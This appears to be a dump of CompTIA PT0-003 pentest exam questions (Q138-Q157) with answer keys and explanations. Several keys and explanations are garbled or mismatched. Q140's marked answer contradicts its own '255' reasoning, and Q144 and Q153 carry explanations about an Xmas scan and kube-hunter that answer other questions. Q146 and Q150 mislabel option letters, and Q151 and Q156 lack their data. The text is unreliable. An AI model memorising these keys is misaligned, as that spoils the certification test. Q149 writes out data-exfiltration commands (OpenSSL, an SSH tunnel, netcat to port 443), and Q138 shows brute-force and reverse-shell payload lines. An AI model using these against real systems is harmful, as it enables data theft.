Real PT0-003 Exam PDF Test Engine Practice Test Questions [Q138-Q157]

CompTIA PT0-003 Exam Syllabus Topics:

Topics and details:

Topic 1. Post-exploitation and Lateral Movement: Cybersecurity analysts will gain skills in establishing and maintaining persistence within a system. This topic also covers lateral movement within an environment and introduces concepts of staging and exfiltration. Lastly, it highlights cleanup and restoration activities, ensuring analysts understand the post-exploitation phase's responsibilities.

Topic 2. Attacks and Exploits: This extensive topic trains cybersecurity analysts to analyze data and prioritize attacks. Analysts will learn how to conduct network, authentication, host-based, web application, cloud, wireless, and social engineering attacks using appropriate tools. Understanding specialized systems and automating attacks with scripting will also be emphasized.

Topic 3. Reconnaissance and Enumeration: This topic focuses on applying information gathering and enumeration techniques. Cybersecurity analysts will learn how to modify scripts for reconnaissance and enumeration purposes. They will also understand which tools to use for these stages, essential for gathering crucial information before performing deeper penetration tests.

Topic 4. Engagement Management: In this topic, cybersecurity analysts learn about pre-engagement activities, collaboration, and communication in a penetration testing environment. The topic covers testing frameworks, methodologies, and penetration test reports. It also explains how to analyze findings and recommend remediation effectively within reports, crucial for real-world testing scenarios.

Topic 5. Vulnerability Discovery and Analysis: In this section, cybersecurity analysts will learn various techniques to discover vulnerabilities. Analysts will also analyze data from reconnaissance, scanning, and enumeration phases to identify threats. Additionally, it covers physical security concepts, enabling analysts to understand security gaps beyond just the digital landscape.


NEW QUESTION # 138
A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stability. Which of the following commands should the tester try first?

  • A. python3 ./buffer_overflow_with_shellcode.py <target> 445
  • B. msf > use <module_name> msf > set <options> msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > run
  • C. responder -I eth0 john responder_output.txt <rdp to target>
  • D. hydra -L administrator -P /path/to/pwlist.txt -t 100 rdp://<target_host>

Answer: C

Explanation:
Responder is a tool used for capturing and analyzing NetBIOS, LLMNR, and MDNS queries to perform various man-in-the-middle (MITM) attacks. It can be used to capture hashed credentials, which can then be cracked offline. Using Responder has the least impact on the host's operating stability compared to more aggressive methods like buffer overflow attacks or payload injections.


NEW QUESTION # 139
A client warns the assessment team that an ICS application is maintained by the manufacturer. Any tampering of the host could void the enterprise support terms of use. Which of the following techniques would be most effective to validate whether the application encrypts communications in transit?

  • A. Installing packet capture software on the server
  • B. Reconfiguring the application to use a proxy
  • C. Requesting that certificate pinning be disabled
  • D. Utilizing port mirroring on a firewall appliance

Answer: D

Explanation:
Using port mirroring on a firewall appliance is the safest and most non-intrusive way to validate if the application encrypts data in transit.
Why Port Mirroring?
Port mirroring (SPAN) enables traffic from the ICS system to be copied and sent to a monitoring device without affecting the host system.
This avoids any tampering with the application or host, preserving enterprise support terms.
Other Options:
A (Installing packet capture software): Installing software on the server would violate the terms of use and tamper with the host.
B (Reconfiguring the application): Reconfiguring the application to use a proxy would require modification, violating the terms of use.
C (Requesting that certificate pinning be disabled): This would involve modifying the application configuration, which is against the terms of use.
CompTIA Pentest+ Reference:
Domain 2.0 (Information Gathering and Vulnerability Identification)
ICS and SCADA Security Guidelines


NEW QUESTION # 140
Given the following Nmap scan command:
[root@kali ~]# nmap 192.168.0.* --exclude 192.168.0.101

Which of the following is the total number of servers that Nmap will attempt to scan?

  • A. 0
  • B. 1
  • C. 2
  • D. 3

Answer: B

Explanation:
The Nmap scan command given will scan all the hosts in the 192.168.0.0/24 subnet, except for the one with the IP address 192.168.0.101. The subnet has 256 possible hosts, but one of them is excluded, so the total number of servers that Nmap will attempt to scan is 255. References:
Nmap Commands - 17 Basic Commands for Linux Network, Section: Scan Multiple Hosts, Subsection: Excluding Hosts from Search; Nmap Cheat Sheet 2023: All the Commands and More, Section: Target Specification, Subsection: --exclude


NEW QUESTION # 141
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

  • A. Scrape web presences and social-networking sites.
  • B. Runtime the company's vendor/supply chain.
  • C. Specially craft and deploy phishing emails to key company leaders.
  • D. Run a vulnerability scan against the company's external website.

Answer: A


NEW QUESTION # 142
A company has hired a penetration tester to deploy and set up a rogue access point on the network.
Which of the following is the BEST tool to use to accomplish this goal?

  • A. Aircrack-ng
  • B. Kismet
  • C. Wireshark
  • D. Wifite

Answer: A

Explanation:
Reference:
https://null-byte.wonderhowto.com/how-to/hack-wi-fi-stealing-wi-fi-passwords-with-evil-twin-attack-0183880/
https://thecybersecurityman.com/2018/08/11/creating-an-evil-twin-or-fake-access-point-using-aircrack-ng-and-


NEW QUESTION # 143
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

  • A. devices are obsolete and are no longer available for replacement.
  • B. protocols are more difficult to understand.
  • C. devices may cause physical world effects.
  • D. devices produce more heat and consume more power.

Answer: C

Explanation:
"A significant issue identified by Wiberg is that using active network scanners, such as Nmap, presents a weakness when attempting port recognition or service detection on SCADA devices. Wiberg states that active tools such as Nmap can use unusual TCP segment data to try and find available ports. Furthermore, they can open a massive amount of connections with a specific SCADA device but then fail to close them gracefully." And since SCADA and ICS devices are designed and implemented with little attention having been paid to the operational security of these devices and their ability to handle errors or unexpected events, the presence of idle open connections may result in errors that cannot be handled by the devices.
Reference: https://www.hindawi.com/journals/scn/2018/3794603/


NEW QUESTION # 144
A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?

  • A. Document which commands can be executed.
  • B. Include the findings in the final report.
  • C. Use this feature to further compromise the server.
  • D. Notify the client immediately.

Answer: D

Explanation:
The Nmap command uses the Xmas scan technique, which sends packets with the FIN, PSH, and URG flags set. This is an attempt to bypass firewall rules and elicit a response from open ports. However, if the target responds with an RST packet, it means that the port is closed. Open ports will either ignore the Xmas scan packets or send back an ACK packet. Therefore, the information most likely indicates that all of the ports in the target range are closed. References: [Nmap Scan Types], [Nmap Port Scanning Techniques], [CompTIA PenTest+ Study Guide: Exam PT0-002, Chapter 4: Conducting Passive Reconnaissance, page 127]


NEW QUESTION # 145
A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities. Which of the following techniques should the tester use?

  • A. Sniffing
  • B. Ping sweeps
  • C. Banner grabbing
  • D. TCP/UDP scanning

Answer: A

Explanation:
To gather information about the network without causing detection mechanisms to flag the reconnaissance activities, the penetration tester should use sniffing.
Sniffing:
Definition: Sniffing involves capturing and analyzing network traffic passing through the network. It is a passive reconnaissance technique that does not generate detectable traffic on the network.
Tools: Tools like Wireshark and tcpdump are commonly used for sniffing. They capture packets and provide insights into network communications, protocols in use, devices, and potential vulnerabilities.
Advantages:
Stealthy: Since sniffing is passive, it does not generate additional traffic that could be detected by intrusion detection systems (IDS) or other monitoring tools.
Information Gathered: Sniffing can reveal IP addresses, MAC addresses, open ports, running services, and potentially sensitive information transmitted in plaintext.
Comparison with Other Techniques:
Banner Grabbing: Active technique that sends requests to a target service to gather information from banners, which can be detected.
TCP/UDP Scanning: Active technique that sends packets to probe open ports and services, easily detected by network monitoring tools.
Ping Sweeps: Active technique that sends ICMP echo requests to determine live hosts, also detectable by network monitoring.
Pentest Reference:
Reconnaissance Phase: Using passive techniques like sniffing during the initial reconnaissance phase helps gather information without alerting the target.
Network Analysis: Understanding the network topology and identifying key assets and vulnerabilities without generating traffic that could trigger alarms.
By using sniffing, the penetration tester can gather detailed information about the network in a stealthy manner, minimizing the risk of detection.


NEW QUESTION # 146
A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

  • A. HTML scraping
  • B. URL spidering
  • C. Covert data exfiltration
  • D. DoS attack

Answer: C

Explanation:
An increase in DNS traffic during a penetration test suggests data exfiltration using DNS tunneling, a method where attackers encode data into DNS queries to avoid detection.
* Option C (Covert data exfiltration): Correct. DNS tunneling (e.g., dnscat2, Iodine) is a stealthy method to bypass firewalls and extract sensitive data.
* Option B (URL spidering): Would cause increased web traffic, not DNS requests.
* Option A (HTML scraping): Involves parsing web pages, not DNS traffic.
* Option D (DoS attack): DoS floods bandwidth or servers, but does not increase DNS queries significantly.
Reference: CompTIA PenTest+ PT0-003 Official Guide - DNS Tunneling & Data Exfiltration


NEW QUESTION # 147
A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?

  • A. inurl:
  • B. site:
  • C. link:
  • D. intitle:

Answer: B

Explanation:
The site: command can be used to restrict searches on Google to a specific domain. For example, site:company.com will return only results from the company.com domain. This can help the penetration tester to find information or pages related to the target domain.


NEW QUESTION # 148
Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

  • A. Tailgating
  • B. Shoulder surfing
  • C. Site survey
  • D. Badge cloning

Answer: A

Explanation:
Tailgating is the term used to describe a situation where a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee.


NEW QUESTION # 149
A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

  • A. Apply 3DES to the data and send over a tunnel UDP port 53.
  • B. Apply AES-256 to the data and send over a tunnel to TCP port 443.
  • C. Apply UTF-8 to the data and send over a tunnel to TCP port 25.
  • D. Apply Base64 to the data and send over a tunnel to TCP port 80.

Answer: B

Explanation:
AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.
Step-by-Step Explanation
Encrypting Data with AES-256:
Use a secure key and initialization vector (IV) to encrypt the data using the AES-256 algorithm.
Example encryption command using OpenSSL:
openssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin -k secretkey
Setting Up a Secure Tunnel:
Use a tool like OpenSSH to create a secure tunnel over TCP port 443.
Example command to set up a tunnel:
ssh -L 443:targetserver:443 user@intermediatehost
Transferring Data Over the Tunnel:
Use a tool like Netcat or SCP to transfer the encrypted data through the tunnel.
Example Netcat command to send data:
cat encrypted.bin | nc targetserver 443
Benefits of Using AES-256 and Port 443:
Security: AES-256 provides strong encryption, making it difficult for attackers to decrypt the data without the key.
Stealth: Sending data over port 443 helps avoid detection by security monitoring systems, as it appears as regular HTTPS traffic.
Real-World Example:
During a penetration test, the tester needs to exfiltrate sensitive data without triggering alerts. By encrypting the data with AES-256 and sending it over a tunnel to TCP port 443, the data exfiltration blends in with normal secure web traffic.
Reference from Pentesting Literature:
Various penetration testing guides and HTB write-ups emphasize the importance of using strong encryption like AES-256 for secure data transfer.
Techniques for creating secure tunnels and exfiltrating data covertly are often discussed in advanced pentesting resources.
Reference:
Penetration Testing - A Hands-on Introduction to Hacking
HTB Official Writeups


NEW QUESTION # 150
While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?

  • A. Nmap
  • B. Shodan
  • C. Amass
  • D. theHarvester

Answer: B

Explanation:
Shodan is a search engine that specializes in finding internet-connected devices, including ICS, IoT, webcams, routers, and servers. Attackers and security professionals use Shodan to scan for publicly accessible systems that may be vulnerable.
* Option D (theHarvester): theHarvester is primarily used for OSINT (Open-Source Intelligence) gathering, such as email addresses, subdomains, and hostnames, but it does not specialize in ICS/IoT discovery.
* Option B (Shodan): Correct. Shodan scans the internet for connected devices and services, allowing penetration testers to find ICS/IoT systems that are exposed.
* Option C (Amass): Amass is used for subdomain enumeration and DNS reconnaissance, not for ICS or IoT discovery.
* Option A (Nmap): Nmap is a port scanner that can identify live hosts and open ports, but it does not search for publicly available systems on a large scale like Shodan.
Reference: CompTIA PenTest+ PT0-003 Official Guide - OSINT and Reconnaissance


NEW QUESTION # 151
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.
INSTRUCTIONS
Select the appropriate answer(s), given the output from each section.
Output 1

Answer:

Explanation:
See all the solutions below in Explanation.



NEW QUESTION # 152
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

  • A. Information regarding the business impact if compromised
  • B. A quick description of the vulnerability and a high-level control to fix it
  • C. The rules of engagement from the assessment
  • D. The executive summary and information regarding the testing company

Answer: B


NEW QUESTION # 153
A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?

  • A. SAST
  • B. SBOM
  • C. IAST
  • D. DAST

Answer: A

Explanation:
kube-hunter is a tool designed to perform security assessments on Kubernetes clusters. It identifies various vulnerabilities, focusing on weaknesses and misconfigurations. Here's why option B is correct:
Kube-hunter: It scans Kubernetes clusters to identify security issues, such as misconfigurations, insecure settings, and potential attack vectors.
Network Configuration Errors: While kube-hunter might identify some network-related issues, its primary focus is on Kubernetes-specific vulnerabilities and misconfigurations.
Application Deployment Issues: These are more related to the applications running within the cluster, not the cluster configuration itself.
Security Vulnerabilities in Docker Containers: Kube-hunter focuses on the Kubernetes environment rather than Docker container-specific vulnerabilities.
Reference from Pentest:
Forge HTB: Highlights the use of specialized tools to identify misconfigurations in environments, similar to how kube-hunter operates within Kubernetes clusters.
Anubis HTB: Demonstrates the importance of identifying and fixing misconfigurations within complex environments like Kubernetes clusters.
Conclusion:
Option B, weaknesses and misconfigurations in the Kubernetes cluster, accurately describes the type of vulnerabilities that kube-hunter is designed to detect.


NEW QUESTION # 154
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?

  • A. nmap -sU -sN -p 1-65535 example.com
  • B. nmap -sU -sT -p 1-65535 example.com
  • C. nmap -sU -sW -p 1-65535 example.com
  • D. nmap -sU -sY -p 1-65535 example.com

Answer: B

Explanation:
To find the state of both TCP and UDP ports using Nmap, the appropriate command should combine both TCP and UDP scan options:
* Understanding the Options:
  * -sU: Performs a UDP scan.
  * -sT: Performs a TCP connect scan.
* Command Explanation:
  * Command: nmap -sU -sT -p 1-65535 example.com
  * Explanation: This command will scan both TCP and UDP ports from 1 to 65535 on the target example.com. Combining -sU and -sT ensures that both types of services are scanned.
* Comparison with Other Options:
  * -sW: Initiates a TCP Window scan, not relevant for identifying the state of TCP and UDP services.
  * -sY: Initiates a SCTP INIT scan, not relevant for this context.
  * -sN: Initiates a TCP Null scan, which is not used for discovering UDP services.


NEW QUESTION # 155
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?

  • A. nmap -p0 -T0 -sS 192.168.1.10
  • B. nmap -sA -sV --host-timeout 60 192.168.1.10
  • C. nmap -A -n 192.168.1.10
  • D. nmap -f --badsum 192.168.1.10

Answer: D

Explanation:
The nmap -f --badsum 192.168.1.10 command is most likely to avoid detection by the client's IDS, as it will use two techniques to evade IDS signatures or filters. The -f option will fragment the IP packets into smaller pieces that might bypass some IDS rules or firewalls. The --badsum option will use an invalid checksum in the TCP or UDP header that might cause some IDS systems to ignore the packets.


NEW QUESTION # 156
A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts.
The executive report outlines the following:

The client is concerned about the availability of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?

  • A. Server 2
  • B. Server 1
  • C. Server 4
  • D. Server 3

Answer: D

Explanation:
Since the client is worried about the availability of their consumer-facing application, the perimeter network web server (Server 3) is the most critical because:
* It is internet-facing, making it a prime target for attackers.
* A compromise could lead to data breaches, downtime, or service disruptions.
* Even though it has fewer vulnerabilities (14 vs. 92 on QA server), its exposure is higher.
* Option A (Development sandbox server): Internal and not publicly accessible.
* Option B (Back-office file transfer server): Important, but not consumer-facing.
* Option C (Perimeter web server): Correct. Publicly accessible and critical to operations.
* Option D (Developer QA server): May have more vulnerabilities, but it's less critical.
Reference: CompTIA PenTest+ PT0-003 Official Guide - Prioritizing Vulnerability Testing

